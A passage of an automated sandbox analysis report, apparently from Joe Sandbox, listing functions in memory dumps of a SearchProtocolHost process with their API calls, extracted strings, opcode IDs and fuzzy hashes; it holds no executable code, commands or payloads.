                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                    • Instruction ID: 7dafc1de4816dad51ce31bede22f8278d6ff0f9e657fb9eb53ea72aeb932df01
                                                    • Opcode Fuzzy Hash: bfd20958474ed37cd433a6109d1ad55ec62e432b419dd531c5f2b1d0db490eae
                                                    • Instruction Fuzzy Hash: BED09E716842093BF650B6A5DC43F5A328D9B54B91F144054BA48E62C1DD69F5004966
                                                    Function 009F48D3 Relevance: 1.5, APIs: 1, Instructions: 20libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                    • Instruction ID: 544c9cbecf77bf5b3dd9ff0c5a2c7b3c068af85b5fc5e87aae387c0f03d7d198
                                                    • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                    • Instruction Fuzzy Hash: B6E01275A4010EABEB40CAC4C881FADB7A8EB08648F105285EA2C97140D630AA55CB41
                                                    Function 03552C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bb754b4d55f322d39e43670d6f4c193b748765daa1f0da41eace36af280cda83
                                                    • Instruction ID: 8c192e96171ba8227de536569555779fdf8ef7bc2c6ed9c37b5574700bcc8d21
                                                    • Opcode Fuzzy Hash: bb754b4d55f322d39e43670d6f4c193b748765daa1f0da41eace36af280cda83
                                                    • Instruction Fuzzy Hash: CAB09B719015C5D5DA11E7605A08717794477D0711F1DC462E6030743F4739D1D1E275

                                                    Non-executed Functions

                                                    Function 033C04E8 Relevance: .1, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821538839.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_33c0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                    • Instruction ID: 42a23a56609bfad9965a3d5664f487753999e0aee670eeb74fa33ff277ac66e5
                                                    • Opcode Fuzzy Hash: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                    • Instruction Fuzzy Hash: 7541C375A2CB8D8FD36CEF6890C1676F2E1FB89300F10052DD89AC3252EB74E8468785
                                                    Function 033CDFFA Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821538839.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_33c0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                    • API String ID: 0-3558027158
                                                    • Opcode ID: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                    • Instruction ID: 81dac447c0ef9ea87f7745c06f777b94cb8f9babb18a4a7aa885cf33aaf02089
                                                    • Opcode Fuzzy Hash: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                    • Instruction Fuzzy Hash: 53914FF04182988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                    Function 033C3CAE Relevance: 33.8, Strings: 27, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821538839.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_33c0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                    • API String ID: 0-132586805
                                                    • Opcode ID: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                    • Instruction ID: 74a1eb98ed7ea9d0bab17907f9160f6f3a99bef6f70bc12936451ad1afa9cd2f
                                                    • Opcode Fuzzy Hash: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                    • Instruction Fuzzy Hash: DE41C7B491074CDBCF28EF04E585AEE7B70FF00314F80816DE908AE291DB358696CB85
                                                    Function 03552890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 9b3d7c50b9ae2231c59d0f027902befd3b0aba226b296164254e5a9446865e22
                                                    • Instruction ID: 731ccf4b6ef1140e60a01f2f95760e26423ca87cf6486a7c441aa7a6005438f5
                                                    • Opcode Fuzzy Hash: 9b3d7c50b9ae2231c59d0f027902befd3b0aba226b296164254e5a9446865e22
                                                    • Instruction Fuzzy Hash: E951D9B5A04216BFCF11DF98E99097EF7B8BB48200B54856BF865D7651D334EE408BE0
                                                    Function 035C2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 320024f5c5958d504fa6f36068bd4724b94c1a78e7b85e46d0c01693455a63fd
                                                    • Instruction ID: 80ee25abf44716b0e2eef201f33dc1aa70d1aa7528c8be032f6beb8c7cc5df2d
                                                    • Opcode Fuzzy Hash: 320024f5c5958d504fa6f36068bd4724b94c1a78e7b85e46d0c01693455a63fd
                                                    • Instruction Fuzzy Hash: 3951B375A10685AFCF20DA98E89097FF7F9BB44204F048C9EE495DB692E774DA408760
                                                    Function 03547630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Execute=1, xrefs: 03584713
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 03584787
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03584742
                                                    • ExecuteOptions, xrefs: 035846A0
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03584655
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035846FC
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03584725
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 3af293f00199517732e2aeaba799a1e41b3b4df056cd0dc56ff8bb8f69e5a315
                                                    • Instruction ID: 602e05b1ab7be2edf89557f3dff61383acab158a1ed7792376a6e9479a772e34
                                                    • Opcode Fuzzy Hash: 3af293f00199517732e2aeaba799a1e41b3b4df056cd0dc56ff8bb8f69e5a315
                                                    • Instruction Fuzzy Hash: 7E514B3560030AAEDF14EB65FC45BAE77B9FF48308F540099D915AF1A1D770AA418B90
                                                    Function 035E6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction ID: 11ac4bae25fb907dbf5298d3c5f680495be3acb152d41397c1c50ce92ad68e8b
                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction Fuzzy Hash: 5E021275508342AFC308CF18D990A6BBBF5FFD8740F448A2DB9999B264DB31E905CB42
                                                    Function 0355B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 620c83b6285b859d9b6c7a55f60ab40ddbec7f0e3813c0b02720325c342d5184
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 9C81B174E162499EDF24CE68E8A97BEBBB1BF45310F1C455BFC61A73A0C734A5408790
                                                    Function 035C20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: 3fbf8e3200cd6b8fa736713c5eaf732814a7efdaa1fe2ac73afbd72cb0fd07cd
                                                    • Instruction ID: 62e364416f34fffe3bedab279df27e2ce1d627f0c2cbdce062b960dd0fa76d67
                                                    • Opcode Fuzzy Hash: 3fbf8e3200cd6b8fa736713c5eaf732814a7efdaa1fe2ac73afbd72cb0fd07cd
                                                    • Instruction Fuzzy Hash: EF216576E10299AFCB11DFB9EC50AEEB7F8FF84654F48051AE905D7250E730DA018BA1
                                                    Function 0353F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035802BD
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035802E7
                                                    • RTL: Re-Waiting, xrefs: 0358031E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: f250a51b90c16aee51506fcd5a97c8c3a3515b8282c45b88447a0a6a30fcc3b5
                                                    • Instruction ID: 2002a936872b4638de56d7b0bdd328ef6ffd569e5f7f5f3c531870fc699dec01
                                                    • Opcode Fuzzy Hash: f250a51b90c16aee51506fcd5a97c8c3a3515b8282c45b88447a0a6a30fcc3b5
                                                    • Instruction Fuzzy Hash: 45E1B031A04742AFD725DF28E884B2AB7E0BF85324F180A5DF5A59B2F1D774D849CB42
                                                    Function 0354BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 03587B8E
                                                    • RTL: Re-Waiting, xrefs: 03587BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03587B7F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 994dc34c04e33b8d27041396184e8ea52807bc82497662b30e6b5a2778b71c79
                                                    • Instruction ID: 9f594470251e3a5f4818d3b1f68665946fcda7ae331bcf104bad340655bfe32b
                                                    • Opcode Fuzzy Hash: 994dc34c04e33b8d27041396184e8ea52807bc82497662b30e6b5a2778b71c79
                                                    • Instruction Fuzzy Hash: 9441E5353007029FDB28DF29E840B6AB7E5FF88715F140A1DF99ADB2A0D771E8058B91
                                                    Function 0354B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0358728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 035872A3
                                                    • RTL: Re-Waiting, xrefs: 035872C1
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03587294
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: f42baad3aac6c955b08124bbfdb0e33ad54b19e24d1bbabc4b0aa1711aa382fa
                                                    • Instruction ID: 920b163563193952e6ecb491b069020a6652ee94115aa71b35feeda7f3410a5c
                                                    • Opcode Fuzzy Hash: f42baad3aac6c955b08124bbfdb0e33ad54b19e24d1bbabc4b0aa1711aa382fa
                                                    • Instruction Fuzzy Hash: 5841D435600206ABDB14EF25EC41F6AB7A5FB88714F240A19F996EB260DB21F85187D1
                                                    Function 035C2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 4e8f74406a4b75d431646ab20cf55c8ef18856bc5ec01db9685af25ddf4d41c6
                                                    • Instruction ID: 7a97f8a5b7c2096bd55cf30900e0d2d4c57e8c06fb3916d46a923a53412bf6e9
                                                    • Opcode Fuzzy Hash: 4e8f74406a4b75d431646ab20cf55c8ef18856bc5ec01db9685af25ddf4d41c6
                                                    • Instruction Fuzzy Hash: 8B318876A102599FCF20DE69EC50BEEB7B8FF44614F44459AE849D7150EB30AA44CBA0
                                                    Function 03557D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: e0a79807dcf5fc3c0e6d2db612cb5cd43b41e4d45c071ed910a50b69d5832cbc
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 0591B271E003169BDB24DE69E8A06BEB7B5BF88320F58455BFC65E72E0D730B9408750
                                                    Function 03519126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 6cc419e474305dcf35192570b57e33204db5c2d61c488c9bcb1595ca07d857d5
                                                    • Instruction ID: 747440f7d872b370f00c8587ca826765fed4a736dce0726fa149ba7b7c54016e
                                                    • Opcode Fuzzy Hash: 6cc419e474305dcf35192570b57e33204db5c2d61c488c9bcb1595ca07d857d5
                                                    • Instruction Fuzzy Hash: 1E814B75D002699BDB35DB54EC44BEEB7B8BF48710F0445DAA919B7290E7309E84CFA0
                                                    Function 0359CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0359CFBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID: @$@4Qw@4Qw
                                                    • API String ID: 4062629308-2383119779
                                                    • Opcode ID: 085ff5fa1f16b2091af7a2239815f91bd8c0b81172b7923b1b96f785c734db90
                                                    • Instruction ID: 800f200fce1c1b79342b05cdf4c1be63006b659775ba1685f185210e67d32dd7
                                                    • Opcode Fuzzy Hash: 085ff5fa1f16b2091af7a2239815f91bd8c0b81172b7923b1b96f785c734db90
                                                    • Instruction Fuzzy Hash: 1E418E79A00225DFDB21DFA5E840A6EBBF8FF85B04F15442AE914DF2A4E734D801CB60